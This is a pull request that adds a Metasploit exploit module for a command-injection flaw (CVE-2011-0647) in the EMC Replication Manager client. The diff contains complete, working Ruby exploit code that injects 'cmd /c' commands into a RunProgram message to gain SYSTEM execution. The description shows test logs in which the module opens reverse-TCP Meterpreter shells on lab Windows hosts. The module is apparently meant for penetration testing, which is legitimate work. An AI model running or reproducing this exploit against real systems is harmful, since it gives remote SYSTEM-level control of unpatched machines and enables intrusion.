### PR TITLE
added exploit module for EMC Replication Manager

### DIFF
--- a/modules/exploits/windows/emc/replication_manager_exec.rb
+++ b/modules/exploits/windows/emc/replication_manager_exec.rb
@@ -1,0 +1,120 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStagerVBS
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'EMC Replication Manager Command Execution',
+      'Description'    => %q{
+        This module exploits a remote command-injection vulnerability in EMC Replication
+        Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram
+        function an attacker may be able to execute arbitrary code commands with SYSTEM privileges.
+        Affected products is EMC Replication Manager < 5.3.
+        This module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003.
+        EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although
+        this module have not been tested against these products.
+      },
+      'Author'         =>
+        [
+          'Anonymous', #Initial discovery
+          'Davy Douhine', #MSF module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2011-0647' ],
+          [ 'OSVDB', '70853' ],
+          [ 'URL', 'http://www.securityfocus.com/bid/46235' ],
+          [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],
+          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-061/' ],
+        ],
+      'DisclosureDate' => 'Feb 07 2011',
+      'Platform'       => 'win',
+      'Arch'          => [ ARCH_X86 ],
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => true,
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(6542),
+        OptString.new('CMD', [ false, 'Execute this command instead of using command stager']),
+      ], self.class)
+  end
+
+  def exploit
+
+  if datastore['CMD']
+    print_status("Executing command '#{datastore['CMD']}'")
+    execute_command(datastore['CMD'], {})
+	return
+  end
+
+  execute_cmdstager({:linemax => 5000})
+  handler
+  end
+
+  def execute_command(cmd, opts)
+    connect
+    hello = "1HELLOEMC00000000000000000000000"
+    sock.put(hello)
+    result = sock.get_once || ''
+    if result and result =~ /RAWHELLO/
+      print_good("We sent hello and get hello back from the server. Good")
+      else
+        disconnect
+		return
+    end
+
+    startsession = "EMC_Len0000000136<?xml version=\"1.0\" encoding=\"UTF-8\"?><ir_message ir_sessionId=0000 ir_type=\"ClientStartSession\" <ir_version>1</ir_version></ir_message>"
+    sock.put(startsession)
+    result = sock.get_once || ''
+    if result and result =~ /EMC/
+      print_good("A session has been created. Good.")
+      else
+        disconnect
+      return
+    end
+
+    runprog = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> "
+    runprog << "<ir_message ir_sessionId=\"01111\" ir_requestId=\"00000\" ir_type=\"RunProgram\" ir_status=\"0\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>"
+    runprog << "<ir_runProgramAppInfo>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; &lt;ir_message ir_sessionId=&quot;00000&quot; ir_requestId=&quot;00000&quot; "
+    runprog << "ir_type=&quot;App Info&quot; ir_status=&quot;0&quot;&gt;&lt;IR_groupEntry IR_groupType=&quot;anywriter&quot;  IR_groupName=&quot;CM1109A1&quot;  IR_groupId=&quot;1&quot; "
+    runprog << "&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?	&amp;gt; &amp;lt;ir_message ir_sessionId=&amp;quot;00000&amp;quot; "
+    runprog << "ir_requestId=&amp;quot;00000&amp;quot;ir_type=&amp;quot;App Info&amp;quot; ir_status=&amp;quot;0&amp;quot;&amp;gt;&amp;lt;aa_anywriter_ccr_node&amp;gt;CM1109A1"
+    runprog << "&amp;lt;/aa_anywriter_ccr_node&amp;gt;&amp;lt;aa_anywriter_fail_1018&amp;gt;0&amp;lt;/aa_anywriter_fail_1018&amp;gt;&amp;lt;aa_anywriter_fail_1019&amp;gt;0"
+    runprog << "&amp;lt;/aa_anywriter_fail_1019&amp;gt;&amp;lt;aa_anywriter_fail_1022&amp;gt;0&amp;lt;/aa_anywriter_fail_1022&amp;gt;&amp;lt;aa_anywriter_runeseutil&amp;gt;1"
+    runprog << "&amp;lt;/aa_anywriter_runeseutil&amp;gt;&amp;lt;aa_anywriter_ccr_role&amp;gt;2&amp;lt;/aa_anywriter_ccr_role&amp;gt;&amp;lt;aa_anywriter_prescript&amp;gt;"
+    runprog << "&amp;lt;/aa_anywriter_prescript&amp;gt;&amp;lt;aa_anywriter_postscript&amp;gt;&amp;lt;/aa_anywriter_postscript&amp;gt;&amp;lt;aa_anywriter_backuptype&amp;gt;1"
+    runprog << "&amp;lt;/aa_anywriter_backuptype&amp;gt;&amp;lt;aa_anywriter_fail_447&amp;gt;0&amp;lt;/aa_anywriter_fail_447&amp;gt;&amp;lt;aa_anywriter_fail_448&amp;gt;0"
+    runprog << "&amp;lt;/aa_anywriter_fail_448&amp;gt;&amp;lt;aa_exchange_ignore_all&amp;gt;0&amp;lt;/aa_exchange_ignore_all&amp;gt;&amp;lt;aa_anywriter_sthread_eseutil&amp;gt;0&amp"
+    runprog << ";lt;/aa_anywriter_sthread_eseutil&amp;gt;&amp;lt;aa_anywriter_required_logs&amp;gt;0&amp;lt;/aa_anywriter_required_logs&amp;gt;&amp;lt;aa_anywriter_required_logs_path"
+    runprog << "&amp;gt;&amp;lt;/aa_anywriter_required_logs_path&amp;gt;&amp;lt;aa_anywriter_throttle&amp;gt;1&amp;lt;/aa_anywriter_throttle&amp;gt;&amp;lt;aa_anywriter_throttle_ios&amp;gt;300"
+    runprog << "&amp;lt;/aa_anywriter_throttle_ios&amp;gt;&amp;lt;aa_anywriter_throttle_dur&amp;gt;1000&amp;lt;/aa_anywriter_throttle_dur&amp;gt;&amp;lt;aa_backup_username&amp;gt;"
+    runprog << "&amp;lt;/aa_backup_username&amp;gt;&amp;lt;aa_backup_password&amp;gt;&amp;lt;/aa_backup_password&amp;gt;&amp;lt;aa_exchange_checksince&amp;gt;1335208339"
+    runprog << "&amp;lt;/aa_exchange_checksince&amp;gt; &amp;lt;/ir_message&amp;gt;&lt;/IR_groupEntry&gt; &lt;/ir_message&gt;</ir_runProgramAppInfo>"
+    runprog << "<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>"
+    emc6 = "EMC_Len000000";
+    runpacket = emc6 + runprog.length.to_s + runprog
+    sock.put(runpacket)
+    Rex.sleep(1) # wait for irccd.exe to write the stager on disk
+    endstring = "B" * 32
+    sock.put(endstring)
+    disconnect
+
+  end
+end


### PR DESCRIPTION
This PR takes into account comments of https://github.com/rapid7/metasploit-framework/pull/2338 
Module exploits a remote command-injection vulnerability in EMC Replication Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram function an attacker may be able to execute arbitrary code commands with SYSTEM privileges.
Affected products is EMC Replication Manager < 5.3.
This module has been successfully tested against EMC Replication Manager 5.2.1 on W2003 and XP.
EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested against these products.
If meterpreter doesn't pop up, it is still possible to run arbitrary windows commands using CMD option.

Test against W2003 (run a command first and then meterpreter):

```
msf> use exploit/windows/emc/replication_manager_exec
msf exploit(replication_manager_exec) > set CMD c:\\windows\\system32\\calc.exe
CMD => c:\windows\system32\calc.exe
msf exploit(replication_manager_exec) > set RHOST 192.168.1.13
RHOST => 192.168.1.13
msf exploit(replication_manager_exec) >
msf exploit(replication_manager_exec) > show options

Module options (exploit/windows/emc/replication_manager_exec):

   Name   Current Setting               Required  Description
   ----   ---------------               --------  -----------
   CMD    c:\windows\system32\calc.exe  no        Execute this command instead of using command stager
   RHOST  192.168.1.13                  yes       The target address
   RPORT  6542                          yes       The target port


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.13     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(replication_manager_exec) > exploit

[*] Started reverse handler on 192.168.1.13:4444
[*] Executing command 'c:\windows\system32\calc.exe'
[+] We sent hello and get hello back from the server. Good
[+] A session has been created. Good.
msf exploit(replication_manager_exec) >
msf exploit(replication_manager_exec) >
msf exploit(replication_manager_exec) > unset CMD
Unsetting CMD...
msf exploit(replication_manager_exec) > exploit

[*] Started reverse handler on 192.168.1.13:4444
[+] We sent hello and get hello back from the server. Good
[+] A session has been created. Good.
[*] Command Stager progress -   4.94% done (4999/101214 bytes)
(...)
[+] We sent hello and get hello back from the server. Good
[+] A session has been created. Good.
[*] Command Stager progress - 100.00% done (101214/101214 bytes)
[*] Sending stage (770048 bytes) to 192.168.1.13
[*] Meterpreter session 2 opened (192.168.1.13:4444 -> 192.168.1.13:6123) at 2013-10-16 15:29:11 +0200

meterpreter >
meterpreter >
meterpreter >
meterpreter > pwd
C:\Program Files\EMC\rm\client\bin
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.13 - Meterpreter session 2 closed.  Reason: User exit
```

Test against XP:

```
msf exploit(replication_manager_exec) > set RHOST 192.168.1.19
RHOST => 192.168.1.19
msf exploit(replication_manager_exec) >
msf exploit(replication_manager_exec) >
msf exploit(replication_manager_exec) > exploit

[*] Started reverse handler on 192.168.1.13:4444
[+] We sent hello and get hello back from the server. Good
[+] A session has been created. Good.
[*] Command Stager progress -   4.94% done (4999/101214 bytes)
(...)
[+] We sent hello and get hello back from the server. Good
[+] A session has been created. Good.
[*] Command Stager progress - 100.00% done (101214/101214 bytes)
[*] Sending stage (770048 bytes) to 192.168.1.19
[*] Meterpreter session 3 opened (192.168.1.13:4444 -> 192.168.1.19:1368) at 2013-10-16 15:30:03 +0200

meterpreter > pwd
C:\Program Files\EMC\rm\client\bin
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.19 - Meterpreter session 3 closed.  Reason: User exit
```
